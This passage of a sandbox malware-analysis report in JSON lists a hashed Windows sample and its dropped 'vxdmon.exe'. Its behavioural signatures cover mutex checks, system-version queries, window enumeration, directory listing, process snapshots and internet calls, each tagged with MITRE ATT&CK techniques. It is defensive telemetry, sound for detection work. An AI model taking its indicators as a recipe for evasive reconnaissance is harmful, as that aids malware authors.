Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"OpenMutexA\" with parameter \"Aeb-75\" - (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004232)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000003b0000002300000023000000000000000000000040f11200000000000000000020df400000000000586c3b771b00000000020000f0ffa901230000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000eceb1200000000008e0000003cec1200feffffffc4eb1200cf003d77d6003d77dfd959778e000000470000003cec12000000000098eb12000000000000ec1200 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400d86b3400d36b34000000000000000000000030000000000164d2120000000000c8df120095e1387733207700feffffff435c3c7750593c77aa000000b8000000d26b3400d06b3400ecd3120024d8120000000000000000000000000000000000000000000000000040130000000030001c5c3b7760d85375ffffffff170000009cd3120024000000030000008cd81200b8dd120024d8120086000000c8d3120096ed3c77fa6b3400a06a127586000000ecd3120024d812000000000086008800a06a1275ecd31200916c1275fa6b3400a06a1275a06a12755cd8120002020000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600683ccc30accc12006d82f97624f7350004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370036006200320030006600300063003600610033003400610037003500650037006600640033003900610035003700390066006300330037006500370031003400650035006100360036003900340038003300660037003200330061003200310034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b3c7743855977d8ebe176ac01300000003000000000000000000016008e009d04000000000000000000000000000000000000170089009d04000000000000000000000870300000000000200000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f97694e3380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f9768ce4380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f300085380000f8c5120067e5397700003000b8eb3800000000000000300000000000b8eb380000000000313800098000000060ee3800c4003000502c3800003b00000000300000000000b8eb38006015000000003000b0e83800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f97634e6380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f300050380000f8c5120067e539770000300060ed380000000000000030000000000060ed380000000000fc3700cb8000000008f03800c4003000d82b3800003b0000000030000000000060ed3800601500000000300058ea3800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f97664e7380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f30002a380000f8c5120067e539770000300090ee380000000000000030000000000090ee380000000000d63700e18000000038f13800c4003000d82b3800003b0000000030000000000090ee3800601500000000300088eb3800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f97694e8380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f300004380000f8c5120067e5397700003000c0ef3800000000000000300000000000c0ef380000000000b03700878000000068f23800c4003000d82b3800003b00000000300000000000c0ef38006015000000003000b8ec3800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f976bce9380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f3000df370000f8c5120067e5397700003000e8f03800000000000000300000000000e8f03800000000008b3700bc8000000090f33800c4003000d82b3800003b00000000300000000000e8f038006015000000003000e0ed3800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f976ecea380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f3000b9370000f8c5120067e539770000300018f2380000000000000030000000000018f23800000000006537005280000000c0f43800c4003000d82b3800003b0000000030000000000018f23800601500000000300010ef3800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f9761cec380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f300093370000f8c5120067e539770000300048f3380000000000000030000000000048f33800000000003f37000880000000f0f53800c4003000d82b3800003b0000000030000000000048f33800601500000000300040f03800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f97644ed380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003800f83b0000ff07000000003000000000007f070000c4003000d82f30006e370000f8c5120067e539770000300070f4380000000000000030000000000070f43800000000001a37002d8000000018f73800c4003000d82b3800003b0000000030000000000070f43800601500000000300068f13800f83b0000ff07000000003000000000007f070000c40030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008c36cc3088c612006d82f9767cee380004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000078613800c8cf1200b344286a81d0fa75000000000000000000000000000000000000000000000000bc020000000000000000000000000000183fcc30c072c13084d412005ecbf875bc02000000000000005df675e0d612000e5df67578d21200dcaafa75010000000000000072000000ffffffffffffffff00d0120078020000000000002500000000d012007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600dc20cc3058d012006d82f976b434390004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff12003601a3000000620bf87500000000087030000000000050000000d40f390002000000b0b0330000000000010000085026350030743000380bf8758cce12000200000040cf12003f08bf7602000000b0b03300000000000100001888fbbe7630cf1200c81cfa7506d1120095fbbe7664d01200b0b03300000000000000000000000000eccf1200000030007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600683fcc30accf12006d82f976b434390004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036004038cc30c4c812006d82f9767c59390004010000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000078be390000000000e93f00d6340000c0a0c03900c400300018ba3900003b0000000030000000000078be3900fcda120004643c7738013000e0633c77e7e85977000000000000300080be39006dd1be763037fb306caee3760000000000000000040300002d40006dc40030000100000000003000500130000c00000080be39000000000002000000180000001c000000d8da12000000000000000000030000009cda12003c6e3c77000000000000000000000000607a3200c075c676607a320000000000c075c676b8da120079dabe76000000000200000010db1200ff2b3c77 (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"IsWow64Process\" with parameter \"6060\" - (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"IsWow64Process\" with parameter \"6064\" - (UID: 00000000-00006064)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"4016\" - (UID: 00000000-00004016)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"vxdmon.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2845.BAT\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2845.BAT\")\n \"vxdmon.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2564.BAT\")\n \"vxdmon.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\R2564.BAT\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindFirstFileW\" with parameter C:\\*.* (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter 82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter vxdmon.exe (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00006060)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"vxdmon.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vxdmon.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"vxdmon.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible)\" (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible)\" (UID: 00000000-00006064)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n 